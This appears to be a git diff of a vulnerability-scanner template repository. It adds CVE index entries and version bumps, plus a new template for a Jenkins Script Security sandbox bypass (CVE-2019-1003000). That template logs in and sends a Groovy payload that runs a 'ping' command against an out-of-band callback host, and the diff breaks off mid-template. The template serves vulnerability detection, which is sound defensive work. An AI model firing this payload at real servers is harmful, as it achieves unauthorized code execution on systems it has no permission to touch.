{"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"}
|
{"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"}
|
||||||
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
|
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
|
||||||
{"ID":"CVE-2016-9299","Info":{"Name":"Jenkins CLI - HTTP Java Deserialization","Severity":"critical","Description":"The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2016-9299.yaml"}
|
|
||||||
{"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"}
|
{"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"}
|
||||||
{"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"}
|
{"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"}
|
||||||
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
|
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
|
||||||
|
@ -2634,6 +2635,7 @@
|
||||||
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
|
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
|
||||||
{"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"}
|
{"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"}
|
||||||
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
|
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
|
||||||
|
{"ID":"CVE-2024-45216","Info":{"Name":"Apache Solr - Authentication Bypass","Severity":"critical","Description":"Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr- from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45216.yaml"}
|
||||||
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
|
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
|
||||||
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
|
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
|
||||||
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
|
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
|
||||||
|
@ -2646,6 +2648,7 @@
|
||||||
{"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
|
{"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
|
||||||
{"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
|
{"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
|
||||||
{"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"}
|
{"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"}
|
||||||
|
{"ID":"CVE-2024-4841","Info":{"Name":"LoLLMS WebUI - Subfolder Prediction via Path Traversal","Severity":"medium","Description":"A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.\n","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2024/CVE-2024-4841.yaml"}
|
||||||
{"ID":"CVE-2024-4879","Info":{"Name":"ServiceNow UI Macros - Template Injection","Severity":"unknown","Description":"ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4879.yaml"}
|
{"ID":"CVE-2024-4879","Info":{"Name":"ServiceNow UI Macros - Template Injection","Severity":"unknown","Description":"ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4879.yaml"}
|
||||||
{"ID":"CVE-2024-4885","Info":{"Name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability.\nThe specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4885.yaml"}
|
{"ID":"CVE-2024-4885","Info":{"Name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability.\nThe specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4885.yaml"}
|
||||||
{"ID":"CVE-2024-48914","Info":{"Name":"Vendure - Arbitrary File Read","Severity":"critical","Description":"Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-48914.yaml"}
|
{"ID":"CVE-2024-48914","Info":{"Name":"Vendure - Arbitrary File Read","Severity":"critical","Description":"Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-48914.yaml"}
|
||||||
|
@ -2676,6 +2679,7 @@
|
||||||
{"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"}
|
{"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"}
|
||||||
{"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"}
|
{"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"}
|
||||||
{"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"}
|
{"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"}
|
||||||
|
{"ID":"CVE-2024-6420","Info":{"Name":"Hide My WP Ghost \u003c 5.2.02 - Hidden Login Page Disclosure","Severity":"high","Description":"The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-6420.yaml"}
|
||||||
{"ID":"CVE-2024-6517","Info":{"Name":"Contact Form 7 Math Captcha \u003c= 2.0.1 - Cross-site Scripting","Severity":"medium","Description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-6517.yaml"}
|
{"ID":"CVE-2024-6517","Info":{"Name":"Contact Form 7 Math Captcha \u003c= 2.0.1 - Cross-site Scripting","Severity":"medium","Description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-6517.yaml"}
|
||||||
{"ID":"CVE-2024-6586","Info":{"Name":"Lightdash v0.1024.6 - Server-Side Request Forgery","Severity":"high","Description":"Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting user’s session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-6586.yaml"}
|
{"ID":"CVE-2024-6586","Info":{"Name":"Lightdash v0.1024.6 - Server-Side Request Forgery","Severity":"high","Description":"Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting user’s session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-6586.yaml"}
|
||||||
{"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"}
|
{"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"}
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
f95ff9c55f4996a2780c830e4149e7b7
|
834a3ed8fe3e7171d2135982772985b0
|
||||||
|
|
|
@ -12039,7 +12039,6 @@ burnmans-diaspora-button
|
||||||
burnmans-subjot-button
|
burnmans-subjot-button
|
||||||
burnzone-commenting
|
burnzone-commenting
|
||||||
burping-the-corpse-sidebar-widget
|
burping-the-corpse-sidebar-widget
|
||||||
burst-statistics
|
|
||||||
burstn-for-wordpress
|
burstn-for-wordpress
|
||||||
burstpay-woocommerce
|
burstpay-woocommerce
|
||||||
bury-admin-bar
|
bury-admin-bar
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
6.3.9
|
6.3.10.2
|
|
@ -1 +1 @@
|
||||||
2.1.17
|
2.1.18
|
|
@ -1 +1 @@
|
||||||
3.2.1
|
3.2.2
|
|
@ -1 +1 @@
|
||||||
7.9.0
|
7.9.1
|
|
@ -1 +1 @@
|
||||||
20241019
|
20241102
|
|
@ -1 +1 @@
|
||||||
8.2.0
|
8.2.1
|
|
@ -1 +1 @@
|
||||||
9.2.0
|
9.2.1
|
|
@ -1 +1 @@
|
||||||
19.5.0
|
19.5.1
|
|
@ -1 +1 @@
|
||||||
5.3.4
|
5.3.5
|
|
@ -1 +1 @@
|
||||||
5.10.2
|
5.10.3
|
|
@ -1 +1 @@
|
||||||
4.10.61
|
4.10.62
|
|
@ -1 +1 @@
|
||||||
1.7.1
|
1.7.1001
|
|
@ -1 +1 @@
|
||||||
1.0.230
|
1.0.231
|
|
@ -1 +1 @@
|
||||||
6.7.1
|
6.8.0
|
|
@ -1 +1 @@
|
||||||
2.16.2
|
2.16.3
|
|
@ -1 +1 @@
|
||||||
4.0.0
|
4.0.1
|
|
@ -0,0 +1,99 @@
|
||||||
|
id: CVE-2019-1003000
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
|
||||||
|
author: sttlr
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2019-1003000
|
||||||
|
cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::*
|
||||||
|
reference:
|
||||||
|
- https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
|
||||||
|
- http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
|
||||||
|
- https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
|
||||||
|
- https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
|
||||||
|
- https://github.com/purple-WL/Jenkins_CVE-2019-1003000
|
||||||
|
- https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 6
|
||||||
|
vendor: jenkins
|
||||||
|
product: script_security
|
||||||
|
tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated
|
||||||
|
|
||||||
|
variables:
|
||||||
|
username: admin
|
||||||
|
vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
|
||||||
|
app_name: "{{rand_text_alpha(8)}}"
|
||||||
|
|
||||||
|
flow: http(1) && http(2) && (http(3) || http(4))
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "jenkins"
|
||||||
|
internal: true
|
||||||
|
case-insensitive: true
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /j_acegi_security_check HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains_all(tolower(body_2), "jenkins", "/logout")'
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
